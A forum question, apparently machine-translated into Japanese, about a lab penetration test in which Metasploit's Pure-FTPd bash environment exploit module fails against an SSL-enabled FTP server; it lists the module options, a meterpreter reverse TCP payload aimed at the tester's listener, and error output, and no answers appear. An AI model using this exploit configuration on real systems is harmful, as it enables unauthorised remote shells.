0

Metasploit を使用して、FTP サーバーを使用するラボの侵入テストを行っています。クライアントは FTP サーバーに接続して認証できます。しかし、私の悪用はできません。

FTP Server:
* Ubuntu 20.4
* Pure-FTPd
* Configured to use SSL/TLS

Client:
* Ubuntu 20.4
* [set ftp:ssl-force true] used to enable SSL
* [telnet <ftp-server-ip> 21] used to connect to FTP server

Metasploit モジュールのオプション:

Module options (exploit/multi/ftp/pureftpd_bash_env_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   <ftp-server-ip>  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metaspl
                                       oit
   RPATH    /bin             yes       Target PATH for binaries used by the CmdStager
   RPORT    21               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local ma
                                       chine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      true             no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting          Required  Description
   ----   ---------------          --------  -----------
   LHOST  <msf-server-ip>          yes       The listen address (an interface may be specified)
   LPORT  4444                     yes       The listen port

Metasploit で、SSL設定をtrueにすると、 という警告が表示されます[!] Changing the SSL option's value may require changing RPORT!。に変更しようとしました443が、エクスプロイトを実行すると、次のようになります。

[*] Started reverse TCP handler on <msf-server-ip>:4444 
[-] <ftp-server-ip>:443 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (<ftp-server-ip>:443) timed out.
[*] Exploit completed, but no session was created.

私の推測では、SSLCert の設定を変更する必要がありますが、set ftp:ssl-force trueコマンドを使用した場合、SSLCert をどのパスに設定すればよいでしょうか?

4

0 に答える 0